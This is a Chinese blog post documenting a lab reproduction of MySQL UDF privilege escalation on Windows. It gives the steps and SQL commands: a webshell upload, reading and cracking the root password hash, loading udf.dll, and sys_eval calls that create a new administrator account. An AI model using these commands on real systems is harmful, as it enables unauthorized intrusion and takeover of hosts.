Mysql-udf提权复现记录

最新推荐文章于 2023-04-21 23:43:09 发布
最新推荐文章于 2023-04-21 23:43:09 发布
阅读量701 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52105695/article/details/113090897
版权

Mysql-udf提权复现

关于udf

UDF (user defined function),自定义函数。通过添加新函数,对MySQL的功能进行扩充。

udf提权原理

在udf.dll文件中,定义了名位sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成,系统用户的创建和提权。

udf提权注意事项

  • 在使用sys_eval()函数时,要显进行引用:

    引用有两个变量,一个是函数名sys_eval,一个是共享包名称udf.dll

    create function sys_eval returns string soname 'udf.dll';

  • 当 MySQL< 5.1 版本时,将 .dll 文件导入到 c:\windows 或者 c:\windows\system32 目录下。

    当 MySQL> 5.1 版本时,将 .dll 文件导入到 MySQL Server 5.xx\lib\plugin 目录下。

  • 保证secure_file_priv的值为空,才可以进行文件的导入和导出。查看语句:

    show global variables like 'secure%';

使用脚本来完成udf的提权复现

上传一句话木马,之后使用蚁剑连接

找到MySQLxxx/data/mysql/user.MYD打开可以看见root用户的账户和密码

密码被MD5加密,在网上找在线工具解密

然后将moon.php上传到服务器目录

在这里插入图片描述

之后访问脚本,登录所找到的用户和密码

在这里插入图片描述

导入udf.dll文件

在这里插入图片描述

引用sys_eval,就是点击脚本的创建sys_eval

回显::create function sys_eval returns string soname ‘moonudf.dll’
Function ‘sys_eval’ already exists

在自定义SQL语句中输入select sys_eval(‘net user’)查看当前用户

得到回显

SQL语句:select sys_eval('net user')

\\DESKTOP-E65T8I4 

-------------------------------------------------------------------------------
23847                    admin                    Administrator            
DefaultAccount           Guest                    WDAGUtilityAccount       

输入select sys_eval('net user chen 123 /add') #创建新用户chen

输入select sys_eval('net localgroup Administrators chen /add') #将我们建立的chen用户加入管理员组去。

输入select sys_eval('net user chen /active:yes') #激活我们新建的账号

完成提权

局限:

  • 限制了对web脚本执行则无法使用

  • 如果网站目录并不包含mysql数据包库则无法,通过蚁剑正常查看到密码,可以进行手工提权

Decentp
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysqludf实战提权
z.mumu的博客
10-18 1212
环境 靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/ raven : 192.168.1.24 kali: 192.168.1.23 信息搜集 1.开放端口情况 访问一下目标80端口,是一个安全的网站。 经过番信息收集,在源码处发现该站点可能是基于wordpress搭建的。 ...
mysql提权udf
wo41ge的博客
12-14 661
UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用。 它有3种返回值,这三种分别是 STRING 字符型 INTEGER 整型 REAL 实数型 提权的前提 mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下 mysql版本小于5.1, udf.dll文件在w
Mysql_UDF提权
热门推荐
极客神殿
02-04 1万+
Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\MySQL Server 5.
权限提升-mysql提权总结
告白的博客
09-06 1063
0x00 mysql数据库提权方式简介 1)udf提权 2)mof提权 3)启动项提权-反弹shell-exp提权 提权思路:1.探针数据库的存在-端口服务,2.必须获取到数据库的权限密码,3.数据库的类型分类 重点:数据库的账号密码获取方式, 1.网站配置文件sql data inc config conn database commin include等 2.读取数据库备份文件下的库中表等信息,数据库名/表名.MYD文件储存密码,例如mysql数据库在mysql_user表中储存账户密码,使用
内网学习之MySQL服务提权
imherer的博客
02-08 430
利用MySQL提权原理: 1、具有mysql的root权限,且mysql以system权限运行。 2、具有执行sql语句的权限,webshell或者外连皆可 UDF提权 UDF(user defined function 用户自定义函数)提权,要求有写权限(secure_file_priv要么为空,要么设置路径),单引号未被过滤 原理: UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数。(其中包括了执行系统命令的函数)要想利用udf,必须上传udf.dll作为udf...
UDF提权复现
qq_51459600的博客
03-30 747
文章目录UDF提权复现环境搭建UDF提权原理提权过程 UDF提权复现 环境搭建 靶机:虚拟机Win7+phpstudy2018 ​ mysql5.5.53 ​ php5.2.17 攻击机:物理机 在已经得到webshell的情况下,利用mysqlUDF提权,在靶机WIn7上创建administrator权限的用户 UDF提权原理 条件:得到服务器webshell,知道数据库账号密码且可以远程连接 在udf.dll文件中,定义了名为sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成系
20210415web渗透学习之Mysqludf提权(一)(胃肠炎住院期间转)
qq_45290991的博客
04-15 142
Root权限 一、上传udf.dll 小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_di...
mysql提权总结
weixin_45605374的博客
12-12 735
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
mysql-udf-http.c
07-01
mysql-udf-http.c编译此文件之后可使用MySQL中http_post或http_get方法,此处为原文件,需要自行编译,请谨慎下载。备注:如发现此文件编译时缺少文件可自行下载
mysql-udf-http下载
09-02
在本场景中,`mysql-udf-http` 是一个特殊的 UDF 库,它为 MySQL 提供了通过 HTTP 协议进行数据交互的功能。由于许多在线资源的链接指向 Google,这可能在中国大陆地区访问受限,因此有人在 CSDN 上分享了这个库,以...
mysqlmysql-udf-http效率测试小记
09-11
看到张宴的博客上关于"http/rest客户端的文章",怎样安装啥的直接都跳过,下面直接进入测试阶段。
mysql-udf-http-1.0下载
02-07
1. **解压**:首先,你需要解压 `mysql-udf-http-1.0.tar.gz` 文件,这可以通过运行 `tar -zxvf mysql-udf-http-1.0.tar.gz` 命令来完成,这将创建一个名为 `mysql-udf-http-1.0` 的目录。 2. **编译**:进入解压后...
mysql-udf-regexp:实现REGEXP _...()函数MySQL用户定义函数模块
05-01
mysql-udf-regexp 该程序包将正则表达式函数用作MySQL用户定义函数(UDF)。 该软件包实现的功能是: REGEXP_LIKE(text, pattern [, mode]) REGEXP_SUBSTR(text, pattern [,position [,occurence [,mode]]]) ...
SQL注入相关问题总结
Bossfrank的博客
04-21 1280
本文介绍了SQL注入相关问题,包括各种SQL的注入类型、防御手段、绕过方法等。也可以作为面试的复习参考。
Mysql-UDF提权
告白的博客
08-14 1794
0x00 提权简介 UDF介绍:User Defined Functions简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。 简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。 我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路
【漏洞复现Mysql UDF提权
cj_Hydra's Blog
11-27 1885
前言: UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。 那么我们该如何使用UDF文件呢? 默认的
MySQL UDF提权执行系统命令
yggcwhat
05-04 929
MySQL UDF提权执行系统命令
MySQL UDF提权
Myu_wzy的博客
11-24 704
一、UDF 介绍 UDFMysql 的一个拓展接口,UDF(Userdefined function) 可翻译为用户自定义函数,是用来拓展 Mysql 的技术手段。 二、UDF提权步骤 1. 查看存放 udf.dll 的指定目录 使用 sql 语句查看 plugin 目录 select @@plugin_dir; show variables like 'plugin%'; 该目录默认是不存在的,需要我们在 Mysql 的安装路径下创建 lib\plugin...
计算机模拟考试.doc
最新发布
07-18
计算机
mysql-udf-http
06-11
mysql-udf-http是MySQL的一个插件,可以通过该插件在MySQL中实现HTTP请求。使用mysql-udf-http插件,可以在MySQL中通过HTTP协议获取远程数据,或者将数据发送到远程服务器。 mysql-udf-http插件可以通过MySQL的用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值